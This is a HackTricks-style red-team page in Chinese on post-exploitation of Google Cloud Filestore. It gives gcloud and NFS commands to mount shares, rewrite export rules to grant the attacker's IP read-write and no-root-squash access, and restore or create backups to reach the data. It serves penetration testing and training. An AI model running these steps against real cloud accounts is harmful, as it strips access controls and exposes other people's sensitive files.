GCP - Filestore Post Exploitation

学习并练习AWS Hacking:HackTricks培训AWS红队专家(ARTE) 学习并练习GCP Hacking:HackTricks培训GCP红队专家(GRTE)

支持HackTricks

Filestore

有关Filestore的更多信息,请查看:

GCP - Filestore Enum

挂载Filestore

共享文件系统可能包含从攻击者角度来看感兴趣的敏感信息。通过访问Filestore,可以挂载它:

sudo apt-get update
sudo apt-get install nfs-common
# Check the share name
showmount -e <IP>
# Mount the share
mkdir /mnt/fs
sudo mount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs

要查找文件存储实例的 IP 地址,请查看页面的枚举部分:

GCP - Filestore Enum

移除限制并获取额外权限

如果攻击者不在具有对共享访问权限的 IP 地址中,但您有足够的权限对其进行修改,可以移除限制或访问权限。还可以授予您的 IP 地址更多特权,以便在共享上具有管理员访问权限:

gcloud filestore instances update nfstest \
--zone=<exact-zone> \
--flags-file=nfs.json

# Contents of nfs.json
{
"--file-share":
{
"capacity": "1024",
"name": "<share-name>",
"nfs-export-options": [
{
"access-mode": "READ_WRITE",
"ip-ranges": [
"<your-ip-private-address>/32"
],
"squash-mode": "NO_ROOT_SQUASH",
"anon_uid": 1003,
"anon_gid": 1003
}
]
}
}

恢复备份

如果有备份,可以将其恢复到现有实例或新实例中,使其信息变得可访问:

# Create a new filestore if you don't want to modify the old one
gcloud filestore instances create <new-instance-name> \
--zone=<zone> \
--tier=STANDARD \
--file-share=name=vol1,capacity=1TB \
--network=name=default,reserved-ip-range=10.0.0.0/29

# Restore a backups in a new instance
gcloud filestore instances restore <new-instance-name> \
--zone=<zone> \
--file-share=<instance-file-share-name> \
--source-backup=<backup-name> \
--source-backup-region=<backup-region>

# Follow the previous section commands to mount it

创建备份并恢复

如果您无法访问共享并且不想修改它,可以像之前提到的那样对其进行备份,然后恢复

# Create share backup
gcloud filestore backups create <back-name> \
--region=<region> \
--instance=<instance-name> \
--instance-zone=<instance-zone> \
--file-share=<share-name>

# Follow the previous section commands to restore it and mount it

学习并练习AWS Hacking:HackTricks 培训 AWS 红队专家 (ARTE) 学习并练习GCP Hacking: HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

Last updated